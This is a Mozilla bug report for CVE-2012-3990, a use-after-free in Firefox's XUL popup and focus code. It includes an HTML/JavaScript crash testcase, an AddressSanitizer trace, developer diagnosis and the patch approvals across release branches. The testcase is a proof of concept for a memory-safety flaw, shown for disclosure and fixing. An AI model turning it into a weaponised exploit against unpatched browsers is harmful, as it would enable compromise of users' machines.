Closed
Bug 787704
(CVE-2012-3990)
Opened 12 years ago
Closed 12 years ago
use-after-free in nsIContent::GetNameSpaceID
Categories
(Core :: XUL, defect)
Core
XUL
Tracking
()
People
(Reporter: miaubiz, Assigned: smaug)
Details
(5 keywords, Whiteboard: [asan][advisory-tracking+])
Attachments
(5 files)
|
1.20 KB,
text/html
|
Details | |
|
6.29 KB,
text/plain
|
Details | |
|
6.29 KB,
text/plain
|
Details | |
|
1.96 KB,
patch
|
masayuki
:
review+
akeybl
:
approval-mozilla-aurora+
|
Details | Diff | Splinter Review |
|
1.96 KB,
patch
|
akeybl
:
approval-mozilla-beta+
akeybl
:
approval-mozilla-esr10+
|
Details | Diff | Splinter Review |
when I load:
<html>
<head>
<style>
.c0 { content:'A' }
</style>
<script>
onload = function() {
document.body.appendChild(document.createElement('td'))
el0=document.createElement('div')
document.body.appendChild(el0)
el1=document.createElement('form')
document.body.appendChild(el1)
el2=document.createElement('input')
el2.setAttribute('type', 'submit')
el1.appendChild(el2)
el3=document.createElement('input')
el3.setAttribute('required', 'A')
el1.appendChild(el3)
el4=document.createElement('input')
el4.type='file'
el1.appendChild(el4)
setTimeout(function() {
el4.focus()
setTimeout(function() {
el4.click()
el2.setAttribute('required', 'A')
el0.setAttribute('class', 'c0')
setTimeout(function() {
document.designMode='on'
document.execCommand('italic')
document.designMode='off'
setTimeout(function() {
el2.click()
}, 100)
}, 100)
}, 100)
}, 100)
}
</script>
</head>
<body>
</body>
</html>
I get a crash like so:
==24180== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffbe11ac98 at pc 0x7fffeeb97d74 bp 0x7ffffffedd70 sp 0x7ffffffedd68
READ of size 8 at 0x7fffbe11ac98 thread T0
#0 0x7fffeeb97d74 in nsIContent::GetNameSpaceID() const /builds/slave/try-lnx64/build/../../../dist/include/nsINodeInfo.h:143
#1 0x7fffee6f9a37 in nsCOMPtr<nsIDOMEventTarget>::operator=(nsCOMPtr<nsIDOMEventTarget> const&) /builds/slave/try-lnx64/build/../../../../dist/include/nsCOMPtr.h:614
#2 0x7fffee6fe5fb in nsXULPopupManager::ShowPopupCallback(nsIContent*, nsMenuPopupFrame*, bool, bool) /builds/slave/try-lnx64/build/layout/xul/base/src/nsXULPopupManager.cpp:716
#3 0x7fffee6fc7a2 in nsXULPopupManager::FirePopupShowingEvent(nsIContent*, bool, bool) /builds/slave/try-lnx64/build/layout/xul/base/src/nsXULPopupManager.cpp:1181
#4 0x7fffee6fcf36 in nsXULPopupManager::ShowPopup(nsIContent*, nsIContent*, nsAString_internal const&, int, int, bool, bool, bool, nsIDOMEvent*) /builds/slave/try-lnx64/build/layout/xul/base/src/nsXULPopupManager.cpp:568
#5 0x7fffee691040 in non-virtual thunk to nsPopupBoxObject::OpenPopup(nsIDOMElement*, nsAString_internal const&, int, int, bool, bool, nsIDOMEvent*) /builds/slave/try-lnx64/build/../../../../dist/include/nsCOMPtr.h:407
0x7fffbe11ac98 is located 24 bytes inside of 368-byte region [0x7fffbe11ac80,0x7fffbe11adf0)
freed by thread T0 here:
#0 0x42ae21 in free ??:0
#1 0x7fffee92a335 in nsNodeUtils::LastRelease(nsINode*) /builds/slave/try-lnx64/build/content/base/src/nsNodeUtils.cpp:261
#2 0x7fffee9ff963 in mozilla::dom::FragmentOrElement::Release() /builds/slave/try-lnx64/build/content/base/src/FragmentOrElement.cpp:1853
#3 0x7fffef02ebc4 in nsGlobalWindow::SetFocusedNode(nsIContent*, unsigned int, bool) /builds/slave/try-lnx64/build/dom/base/nsGlobalWindow.cpp:7765
#4 0x7fffeefc93be in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool)
aurora and nightly affected atleast.
Component: General → XP Toolkit/Widgets: Menus
Product: Firefox → Core
|
Assignee | |
Updated•12 years ago
|
Attachment #657590 -
Attachment mime type: text/plain → text/html
|
|
Assignee | |
Comment 3•12 years ago
|
||
We end up having sContent pointing to a deleted object.
sPresContext looks scary too, and sTextStateObserver.
Masayuki, could you look at this? If not, I will.
|
|
Assignee | |
Comment 4•12 years ago
|
||
Hmm, I guess sPresContext is ok and sTextStateObserver is actually refcounted.
|
|
Assignee | |
Comment 6•12 years ago
|
||
Or no :) My initial approach doesn't seem to work.
Assignee: bugs → nobody
|
|
Assignee | |
Updated•12 years ago
|
Assignee: nobody → bugs
|
|
Assignee | |
Comment 7•12 years ago
|
||
Attachment #657613 -
Flags: review?(masayuki)
|
|
Assignee | |
Comment 8•12 years ago
|
||
Comment on attachment 657613 [details] [diff] [review]
patch
IIRC static nsCOMPtrs should be avoided, so I used manual refcounting here.
Also, since sContent is released when prescontext goes away, there
shouldn't be leaks.
|
||
Updated•12 years ago
|
Severity: normal → critical
OS: Linux → All
Hardware: x86 → All
Whiteboard: [asan]
|
||
Comment 9•12 years ago
|
||
Comment on attachment 657613 [details] [diff] [review]
patch
This patch looks okay for me.
However, I don't understand why does the testcase in comment 0 cause such case. Looks like el4.focus() caused releasing the content, why?
Attachment #657613 -
Flags: review?(masayuki) → review+
|
|
Assignee | |
Comment 10•12 years ago
|
||
It goes something like: Focus would be in native anon button of input type file when designMode = on reframes the element.
|
|
Assignee | |
Comment 11•12 years ago
|
||
|
|
||
Comment 12•12 years ago
|
||
(In reply to Olli Pettay [:smaug] from comment #10)
> It goes something like: Focus would be in native anon button of input type
> file when designMode = on reframes the element.
When it's reframed, all of the anon contents will be recreated?
|
|
Assignee | |
Comment 13•12 years ago
|
||
Yes.
|
|
||
Comment 14•12 years ago
|
||
Thanks, I understand.
|
||
Updated•12 years ago
|
status-firefox-esr10:
--- → affected
status-firefox16:
--- → affected
status-firefox17:
--- → affected
status-firefox18:
--- → affected
tracking-firefox-esr10:
--- → ?
tracking-firefox16:
--- → +
tracking-firefox17:
--- → +
tracking-firefox18:
--- → +
|
||
Updated•12 years ago
|
|
||
Comment 16•12 years ago
|
||
Olli, is this ready to be landed?
|
||
Updated•12 years ago
|
tracking-firefox-esr10:
16+ → ---
|
|
Assignee | |
Comment 17•12 years ago
|
||
(In reply to Andrew McCreight [:mccr8] from comment #16)
> Olli, is this ready to be landed?
Yes, but wasn't sure whether I should land it immediately.
|
|
Assignee | |
Comment 18•12 years ago
|
||
I'll try to remember to land it tomorrow.
|
|
||
Comment 19•12 years ago
|
||
(In reply to Olli Pettay [:smaug] from comment #18)
> I'll try to remember to land it tomorrow.
Now's the time. Please land and nominate for uplift.
|
|
Assignee | |
Comment 20•12 years ago
|
||
Comment on attachment 657793 [details] [diff] [review]
for branches with nsnull
[Approval Request Comment]
Bug caused by (feature/regressing bug #): NA
User impact if declined: Security sensitive crash
Testing completed (on m-c, etc.): tested locally. Will land m-c real soon
Risk to taking this patch (and alternatives if risky): May keep an element
longer than before, so that could increase memory usage temporarily.
String or UUID changes made by this patch: NA
Attachment #657793 -
Flags: approval-mozilla-esr10?
Attachment #657793 -
Flags: approval-mozilla-beta?
|
|
Assignee | |
Comment 21•12 years ago
|
||
Comment on attachment 657613 [details] [diff] [review]
patch
[Approval Request Comment]
Bug caused by (feature/regressing bug #): NA
User impact if declined: Security sensitive crash
Testing completed (on m-c, etc.): tested locally. Will land m-c real soon
Risk to taking this patch (and alternatives if risky): May keep an element
longer than before, so that could increase memory usage temporarily.
String or UUID changes made by this patch: NA
Attachment #657613 -
Flags: approval-mozilla-aurora?
|
|
Assignee | |
Comment 22•12 years ago
|
||
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
|
|
||
Updated•12 years ago
|
tracking-firefox-esr10:
--- → ?
|
|
||
Comment 23•12 years ago
|
||
Comment on attachment 657613 [details] [diff] [review]
patch
[Triage Comment]
Approving for Aurora in preparation for Beta consideration.
Attachment #657613 -
Flags: approval-mozilla-aurora? → approval-mozilla-aurora+
|
|
||
Updated•12 years ago
|
|
|
||
Updated•12 years ago
|
|
|
||
Comment 24•12 years ago
|
||
We'll approve on Monday if there haven't been any Nightly/Aurora regressions (please land on Aurora asap).
|
|
||
Updated•12 years ago
|
Target Milestone: --- → mozilla18
|
|
||
Comment 25•12 years ago
|
||
|
|
Assignee | |
Comment 26•12 years ago
|
||
Thanks for landing to Aurora.
(I was going to do it later today.)
|
|
||
Comment 27•12 years ago
|
||
Comment on attachment 657793 [details] [diff] [review]
for branches with nsnull
[Triage Comment]
Approving for Beta (please land no later than tomorrow morning PT) and ESR10.
Attachment #657793 -
Flags: approval-mozilla-esr10?
Attachment #657793 -
Flags: approval-mozilla-esr10+
Attachment #657793 -
Flags: approval-mozilla-beta?
Attachment #657793 -
Flags: approval-mozilla-beta+
|
|
Assignee | |
Comment 28•12 years ago
|
||
|
|
||
Updated•12 years ago
|
|
||
Updated•12 years ago
|
Whiteboard: [asan] → [asan][advisory-tracking+]
|
|
||
Updated•12 years ago
|
Alias: CVE-2012-3990
|
|
||
Updated•12 years ago
|
Group: core-security
Flags: sec-bounty+
|
||
Updated•6 years ago
|
Component: XP Toolkit/Widgets: Menus → XUL
|
||
Updated•9 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•